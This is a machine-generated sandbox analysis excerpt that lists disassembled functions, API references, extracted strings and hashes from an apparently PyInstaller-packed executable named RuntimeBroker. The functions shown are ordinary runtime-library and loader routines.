GetDC.USER32 ref: 00007FF72B05211B
SelectObject.GDI32 ref: 00007FF72B052162
DrawTextW.USER32 ref: 00007FF72B052185
SelectObject.GDI32 ref: 00007FF72B05219B
ReleaseDC.USER32 ref: 00007FF72B0521AB
MoveWindow.USER32 ref: 00007FF72B0521FB
MoveWindow.USER32 ref: 00007FF72B05223B
MoveWindow.USER32 ref: 00007FF72B05228E
MoveWindow.USER32 ref: 00007FF72B0522D6

Strings

P%, xrefs: 00007FF72B05216F

Memory Dump Source

Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: MoveWindow$ObjectSelect$DrawReleaseText
String ID: P%
API String ID: 2147705588-2959514604
Opcode ID: 028f263e58f42d33d872b22938efc015f71aa7b4c996476cfe5add7d8b08dd36
Instruction ID: d3ece5d01bbbb18aa78b8ac3ae954657df6fdaa7de3286a86073c4a7a856e066
Opcode Fuzzy Hash: 028f263e58f42d33d872b22938efc015f71aa7b4c996476cfe5add7d8b08dd36
Instruction Fuzzy Hash: 635109266047A186D6349F26E4581BAF7A1FB98B61F404135EFDE43794DF3CD085DB20

Function 00007FFE0C0BE350 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 196COMMONLIBRARYCODE

Download Yara Rule

Strings

template-parameter-, xrefs: 00007FFE0C0BE417
generic-type-, xrefs: 00007FFE0C0BE45E
`generic-type-, xrefs: 00007FFE0C0BE491
`template-parameter-, xrefs: 00007FFE0C0BE44A

Memory Dump Source

Source File: 00000007.00000002.1780946582.00007FFE0C0B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE0C0B0000, based on PE: true

Associated: 00000007.00000002.1780870002.00007FFE0C0B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781080365.00007FFE0C0C1000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781158686.00007FFE0C0C6000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781227690.00007FFE0C0C7000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffe0c0b0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID: `generic-type-$`template-parameter-$generic-type-$template-parameter-
API String ID: 0-3207858774
Opcode ID: 6f458657f8fae6e2f2557f40169539ea56a3e6fb73d2116d9b83691f1491e61c
Instruction ID: 4f6c0fb73b9f3bbbe658a22914e7a0d73c142a055f980942886ef65456ffc252
Opcode Fuzzy Hash: 6f458657f8fae6e2f2557f40169539ea56a3e6fb73d2116d9b83691f1491e61c
Instruction Fuzzy Hash: 92916E62A88A4699FB20CB29D4A02F877A2BF54B44F444131EB6E037B5DF3DE545C358

Function 00007FFE0C0BA13C Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 120COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FFE0C0BA198

Part of subcall function 00007FFE0C0B722C: DName::operator+=.LIBVCRUNTIME ref: 00007FFE0C0B7247

DName::operator+.LIBVCRUNTIME ref: 00007FFE0C0BA2C5

Strings

struct , xrefs: 00007FFE0C0BA2E9
`unknown ecsu', xrefs: 00007FFE0C0BA164
coclass , xrefs: 00007FFE0C0BA27E
enum , xrefs: 00007FFE0C0BA287
class , xrefs: 00007FFE0C0BA2DA
union , xrefs: 00007FFE0C0BA2F2
cointerface , xrefs: 00007FFE0C0BA26C

Memory Dump Source

Source File: 00000007.00000002.1780946582.00007FFE0C0B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE0C0B0000, based on PE: true

Associated: 00000007.00000002.1780870002.00007FFE0C0B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781080365.00007FFE0C0C1000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781158686.00007FFE0C0C6000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781227690.00007FFE0C0C7000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffe0c0b0000_RuntimeBroker.jbxd

Similarity

API ID: Name::operator+$Name::operator+=
String ID: `unknown ecsu'$class $coclass $cointerface $enum $struct $union
API String ID: 179159573-1464470183
Opcode ID: 2fc61dd6c602e97fa3c1e55ca06bd20aebc659b0b394667bc2b1a0081ee2f141
Instruction ID: 1b71bbaef17b5342e61b33eebdd50e45ea8e81d213994d3bc2ba7ce068895375
Opcode Fuzzy Hash: 2fc61dd6c602e97fa3c1e55ca06bd20aebc659b0b394667bc2b1a0081ee2f141
Instruction Fuzzy Hash: 63515972F98A2289FB14CB6CE8A05BC37B2BF14784F504135EF0D66AA8DF29E545D704

Function 00007FFE0C0B88E4 Relevance: 15.2, APIs: 10, Instructions: 150COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FFE0C0B89AE
DName::operator+.LIBVCRUNTIME ref: 00007FFE0C0B89BE
DName::operator+.LIBVCRUNTIME ref: 00007FFE0C0B8A0A
DName::operator+.LIBVCRUNTIME ref: 00007FFE0C0B8A1A
DName::operator+.LIBVCRUNTIME ref: 00007FFE0C0B8A2A
DName::operator+.LIBVCRUNTIME ref: 00007FFE0C0B8A9D
DName::operator+.LIBVCRUNTIME ref: 00007FFE0C0B8AAE
DName::operator+.LIBVCRUNTIME ref: 00007FFE0C0B8AC0
DName::operator+.LIBVCRUNTIME ref: 00007FFE0C0B8AEC
DName::operator+.LIBVCRUNTIME ref: 00007FFE0C0B8AFB

Memory Dump Source

Source File: 00000007.00000002.1780946582.00007FFE0C0B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE0C0B0000, based on PE: true

Associated: 00000007.00000002.1780870002.00007FFE0C0B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781080365.00007FFE0C0C1000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781158686.00007FFE0C0C6000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781227690.00007FFE0C0C7000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffe0c0b0000_RuntimeBroker.jbxd

Similarity

API ID: Name::operator+
String ID:
API String ID: 2943138195-0
Opcode ID: 28d39e64d2900046752fe00e0d170ae61e4b908a297697eb59c3c366de5be272
Instruction ID: 230c0c2e9b0545fd4f01df26a53a2b7af125933795249f4ab23ab2ecb0128a01
Opcode Fuzzy Hash: 28d39e64d2900046752fe00e0d170ae61e4b908a297697eb59c3c366de5be272
Instruction Fuzzy Hash: 3F616B62B04B5298FB10DBA8D8A01EC33B6BF44788F408536DF4D6BAA9DF78D545C344

Function 00007FF72B0655A0 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 494COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B0655E3
_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B0659D0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B065C6C

Strings

f, xrefs: 00007FF72B065705
-, xrefs: 00007FF72B065679
p, xrefs: 00007FF72B06570D
:, xrefs: 00007FF72B06579C
p, xrefs: 00007FF72B065695

Memory Dump Source

Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: -$:$f$p$p
API String ID: 3215553584-2013873522
Opcode ID: 6485ef080591767760fe67f9caec812fff4e1ba5c20858478bd9f0fbec74de2f
Instruction ID: 3a1a93cdc9a6f0daa4fbd485d14f13044375d76433174507a8c73f4f7c267376
Opcode Fuzzy Hash: 6485ef080591767760fe67f9caec812fff4e1ba5c20858478bd9f0fbec74de2f
Instruction Fuzzy Hash: FE129031B0824B86FB36BB19D95427DE651FB48750FD4413AE789466E6EF3CE9808F20

Function 00007FF72B0602E8 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B060328
_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B0606F0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B06098F

Strings

p, xrefs: 00007FF72B060432
p, xrefs: 00007FF72B0603CD
f, xrefs: 00007FF72B0603C0
f, xrefs: 00007FF72B060575
f, xrefs: 00007FF72B06042A

Memory Dump Source

Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: f$f$p$p$f
API String ID: 3215553584-1325933183
Opcode ID: 47a7a6303f50c331757a7ed503f6ccc132970c05c2223996d06c8e5714df85c4
Instruction ID: d23e6f81f4635485ad61dec4e4781a4c61a9f2389b2a0e2181bc2c83a5edb76a
Opcode Fuzzy Hash: 47a7a6303f50c331757a7ed503f6ccc132970c05c2223996d06c8e5714df85c4
Instruction Fuzzy Hash: 44128471F4C14386FB35BB18D894A79E261FB94754FC88039E699466E4EF7CE4808F60

Function 00007FFE0C0B31A0 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 314COMMON

Download Yara Rule

APIs

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FFE0C0B333E
terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE0C0B334B

Part of subcall function 00007FFE0C0B6710: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE0C0B239E), ref: 00007FFE0C0B671E

terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE0C0B35F9
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE0C0B3644
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FFE0C0B3679

Strings

csm, xrefs: 00007FFE0C0B32E7
csm, xrefs: 00007FFE0C0B3367
csm, xrefs: 00007FFE0C0B3285

Memory Dump Source

Source File: 00000007.00000002.1780946582.00007FFE0C0B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE0C0B0000, based on PE: true

Associated: 00000007.00000002.1780870002.00007FFE0C0B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781080365.00007FFE0C0C1000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781158686.00007FFE0C0C6000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781227690.00007FFE0C0C7000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffe0c0b0000_RuntimeBroker.jbxd

Similarity

API ID: abortterminate$Is_bad_exception_allowedstd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 211107550-393685449
Opcode ID: 1f2c6e9c8ad6c1917ecaa8d6efe9c468c91fc9baef10e6d9588306a72b9f3ebc
Instruction ID: 941eaac9f84e7e2a1df3fb51e6080d098b0c6a54385573a170ff7ed8d2e5baec
Opcode Fuzzy Hash: 1f2c6e9c8ad6c1917ecaa8d6efe9c468c91fc9baef10e6d9588306a72b9f3ebc
Instruction Fuzzy Hash: 18E1DE72A487828AE710DF68D4A12AD7BA2FF45B48F244136EB8D53776CF38E585C704

Function 00007FF72B051050 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 111COMMON

Download Yara Rule

Strings

Failed to extract %s: failed to read data chunk!, xrefs: 00007FF72B0511D0
malloc, xrefs: 00007FF72B0510FC
Failed to extract %s: failed to open archive file!, xrefs: 00007FF72B051097
fread, xrefs: 00007FF72B0511D7
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF72B0510C5
Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF72B0510F5
fseek, xrefs: 00007FF72B0510CC

Memory Dump Source

Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: Message
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 2030045667-3659356012
Opcode ID: 4ae8fd5b95060b3838ac946bbc1241e3e0ff1853dfe5bebea26071531e7b2444
Instruction ID: 66492195f0ef10e113b8ef074408a1253e2f3314250ab292c40fd796f3e19c80
Opcode Fuzzy Hash: 4ae8fd5b95060b3838ac946bbc1241e3e0ff1853dfe5bebea26071531e7b2444
Instruction Fuzzy Hash: FC41AF21B0864642EA32BB1AAC905BAE390FF44BC4FC44031DD4D47BB5EE3CE8458B24

Function 00007FFE0C0BBE24 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 111COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FFE0C0BBFD8

Part of subcall function 00007FFE0C0B8C24: DName::operator+.LIBVCRUNTIME ref: 00007FFE0C0B913D
Part of subcall function 00007FFE0C0B8C24: DName::operator+.LIBVCRUNTIME ref: 00007FFE0C0B9175

DName::operator+.LIBVCRUNTIME ref: 00007FFE0C0BBF8A

Strings

std::nullptr_t , xrefs: 00007FFE0C0BBF16
void, xrefs: 00007FFE0C0BBE6E
void , xrefs: 00007FFE0C0BBE96
std::nullptr_t, xrefs: 00007FFE0C0BBF03
cli::pin_ptr<, xrefs: 00007FFE0C0BBFA1
cli::array<, xrefs: 00007FFE0C0BBF57

Memory Dump Source

Source File: 00000007.00000002.1780946582.00007FFE0C0B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE0C0B0000, based on PE: true

Associated: 00000007.00000002.1780870002.00007FFE0C0B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781080365.00007FFE0C0C1000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781158686.00007FFE0C0C6000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781227690.00007FFE0C0C7000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffe0c0b0000_RuntimeBroker.jbxd

Similarity

API ID: Name::operator+
String ID: cli::array<$cli::pin_ptr<$std::nullptr_t$std::nullptr_t $void$void
API String ID: 2943138195-2239912363
Opcode ID: e2dcc5ac231621b7bb9adceaede0f9dd180f9bba2b8fff5e7c5622460418e45f
Instruction ID: 696e18d3d82b10e6f0173f4d0a13381641946f57a0cf543c0146ba727d75e3a1
Opcode Fuzzy Hash: e2dcc5ac231621b7bb9adceaede0f9dd180f9bba2b8fff5e7c5622460418e45f
Instruction Fuzzy Hash: 95515862E58B569AFB11CB68D8912BC77B2BF08748F444136EB4D12BB5DF3CA044CB18

Function 00007FF72B057FC0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 89processsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF72B0586B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF72B053FA4,00000000,00007FF72B051925), ref: 00007FF72B0586E9

SetConsoleCtrlHandler.KERNEL32(?,00007FF72B0539C0), ref: 00007FF72B05800A
GetStartupInfoW.KERNEL32(?,00007FF72B0539C0), ref: 00007FF72B05802B

Part of subcall function 00007FF72B06978C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72B0697A0

Part of subcall function 00007FF72B067A2C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72B067A93

GetCommandLineW.KERNEL32(?,00007FF72B0539C0), ref: 00007FF72B0580CD
CreateProcessW.KERNEL32 ref: 00007FF72B05810F
WaitForSingleObject.KERNEL32(?,00007FF72B0539C0), ref: 00007FF72B058123
GetExitCodeProcess.KERNEL32 ref: 00007FF72B058133

Strings

Failed to create child process!, xrefs: 00007FF72B05813F
CreateProcessW, xrefs: 00007FF72B058146

Memory Dump Source

Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
String ID: CreateProcessW$Failed to create child process!
API String ID: 2895956056-699529898
Opcode ID: 2d8580ce5d81a01d0f8683f73fef31206a84e7faf833a053d17f215ed92b6c27
Instruction ID: c404638555abeb3a581b376031f73904b500fd55e5137030cea9cb5faedec2c3
Opcode Fuzzy Hash: 2d8580ce5d81a01d0f8683f73fef31206a84e7faf833a053d17f215ed92b6c27
Instruction Fuzzy Hash: 97413F31A1878181DA31AB28E8952AEF391FBC9364F944739E6AD43BE5DF7CD1448F10

Function 00007FF72B05DD28 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00007FF72B05DD85

Part of subcall function 00007FF72B05ECDC: __GetUnwindTryBlock.LIBCMT ref: 00007FF72B05ED1F
Part of subcall function 00007FF72B05ECDC: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00007FF72B05ED44

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FF72B05DE5D
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00007FF72B05E0AB
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF72B05E1B8

Strings

csm, xrefs: 00007FF72B05DE06
csm, xrefs: 00007FF72B05DE80
csm, xrefs: 00007FF72B05DD9F

Memory Dump Source

Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: e61afc8d21ba52cdbe611d77afa9c967b031d652e012678c684f0478f5a183c7
Instruction ID: e48fad1f0e5b5b7ef7c7672a152cc725cef7ad8491b71f53b0e99254011291a5
Opcode Fuzzy Hash: e61afc8d21ba52cdbe611d77afa9c967b031d652e012678c684f0478f5a183c7
Instruction Fuzzy Hash: C6D19632A0874186EB31AB69D8C03ADB7A4FB55788F504235DE8D57FA5DF38E491CB20

Function 00007FFE0C0B5F0A Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 162COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE0C0B63F0: RtlPcToFileHeader.KERNEL32 ref: 00007FFE0C0B6434
Part of subcall function 00007FFE0C0B63F0: RaiseException.KERNEL32 ref: 00007FFE0C0B647A

RtlPcToFileHeader.KERNEL32 ref: 00007FFE0C0B5FA7
FindMITargetTypeInstance.LIBVCRUNTIME ref: 00007FFE0C0B6003

Strings

Bad dynamic_cast!, xrefs: 00007FFE0C0B6072
Bad read pointer - no RTTI data!, xrefs: 00007FFE0C0B6108
Access violation - no RTTI data!, xrefs: 00007FFE0C0B5F0A, 00007FFE0C0B612B
Attempted a typeid of nullptr pointer!, xrefs: 00007FFE0C0B60E5

Memory Dump Source

Source File: 00000007.00000002.1780946582.00007FFE0C0B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE0C0B0000, based on PE: true

Associated: 00000007.00000002.1780870002.00007FFE0C0B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781080365.00007FFE0C0C1000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781158686.00007FFE0C0C6000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781227690.00007FFE0C0C7000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffe0c0b0000_RuntimeBroker.jbxd

Similarity

API ID: FileHeader$ExceptionFindInstanceRaiseTargetType
String ID: Access violation - no RTTI data!$Attempted a typeid of nullptr pointer!$Bad dynamic_cast!$Bad read pointer - no RTTI data!
API String ID: 1852475696-928371585
Opcode ID: 7f6c35cefbfcfc98e88ebc0aa35afe6c2c6ede9eabcdb344d1914a97fbaad475
Instruction ID: 7ce0a6f9054f1410d3a7e3bef4617b461ed6dd7c327eaf5642040df0014503f4
Opcode Fuzzy Hash: 7f6c35cefbfcfc98e88ebc0aa35afe6c2c6ede9eabcdb344d1914a97fbaad475
Instruction Fuzzy Hash: F151C272A5DA4692EE24DB59E8A06BE6362FF44B84F404431EB8E07775EF3CE505C304

Function 00007FFE0C0BE148 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 127COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FFE0C0BE1BC
DName::operator+.LIBVCRUNTIME ref: 00007FFE0C0BE1CB
DName::operator+=.LIBVCRUNTIME ref: 00007FFE0C0BE2E8

Part of subcall function 00007FFE0C0BC3C8: DName::operator+.LIBVCRUNTIME ref: 00007FFE0C0BC459
Part of subcall function 00007FFE0C0BC3C8: DName::operator+.LIBVCRUNTIME ref: 00007FFE0C0BC492
Part of subcall function 00007FFE0C0BC3C8: DName::operator+.LIBVCRUNTIME ref: 00007FFE0C0BC7BB

DName::operator+.LIBVCRUNTIME ref: 00007FFE0C0BE26B
DName::operator+.LIBVCRUNTIME ref: 00007FFE0C0BE27B
DName::operator+.LIBVCRUNTIME ref: 00007FFE0C0BE325

Strings

{for , xrefs: 00007FFE0C0BE1F4

Memory Dump Source

Source File: 00000007.00000002.1780946582.00007FFE0C0B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE0C0B0000, based on PE: true

Associated: 00000007.00000002.1780870002.00007FFE0C0B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781080365.00007FFE0C0C1000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781158686.00007FFE0C0C6000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781227690.00007FFE0C0C7000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffe0c0b0000_RuntimeBroker.jbxd

Similarity

API ID: Name::operator+$Name::operator+=
String ID: {for
API String ID: 179159573-864106941
Opcode ID: edc966f78679f2c80b6a90da374f91d2d358e76260b44eb27b7c84d8a506cb89
Instruction ID: 5d98e19601e749568f3cae8178d784de52d108a86e12ded1eebcf848318f4fff
Opcode Fuzzy Hash: edc966f78679f2c80b6a90da374f91d2d358e76260b44eb27b7c84d8a506cb89
Instruction Fuzzy Hash: 6B515672A48A85A9EB11CF28D4953EC23A2FF44B48F808031EB5C1BBA5DF7CD554C358

Function 00007FF72B057C40 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 116COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(?,?,FFFFFFFF,00007FF72B053834), ref: 00007FF72B057CE4
CreateDirectoryW.KERNEL32(?,?,FFFFFFFF,00007FF72B053834), ref: 00007FF72B057D2C

Part of subcall function 00007FF72B057E10: GetEnvironmentVariableW.KERNEL32(00007FF72B05365F), ref: 00007FF72B057E47
Part of subcall function 00007FF72B057E10: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF72B057E69

Part of subcall function 00007FF72B067548: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72B067561

Part of subcall function 00007FF72B0526C0: MessageBoxW.USER32 ref: 00007FF72B052736

Strings

LOADER: failed to set the TMP environment variable., xrefs: 00007FF72B057CBC
TMP, xrefs: 00007FF72B057C7C, 00007FF72B057D83
LOADER: length of teporary directory path exceeds maximum path length!, xrefs: 00007FF72B057D5E
_MEI%d, xrefs: 00007FF72B057CF2
TMP, xrefs: 00007FF72B057CA2

Memory Dump Source

Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: Environment$CreateDirectoryExpandMessagePathStringsTempVariable_invalid_parameter_noinfo
String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
API String ID: 740614611-1339014028
Opcode ID: 41794429c51d27e0df7a21877b4f19c7cdf826b4f928fd21ea6cb85727b80d41
Instruction ID: 866b8e1216ac7c22f96000f58ce65c0b198d16ce94fe039142eb47ad575d0073
Opcode Fuzzy Hash: 41794429c51d27e0df7a21877b4f19c7cdf826b4f928fd21ea6cb85727b80d41
Instruction Fuzzy Hash: D6418C61B0964244EA36FB299D912F9D291FF89780FC40135DD0D57BB6EE3CF5009B60

Function 00007FFE0C0B68AC Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,00007FFE0C0B6A6B,?,?,00000000,00007FFE0C0B689C,?,?,?,?,00007FFE0C0B65E5), ref: 00007FFE0C0B6931
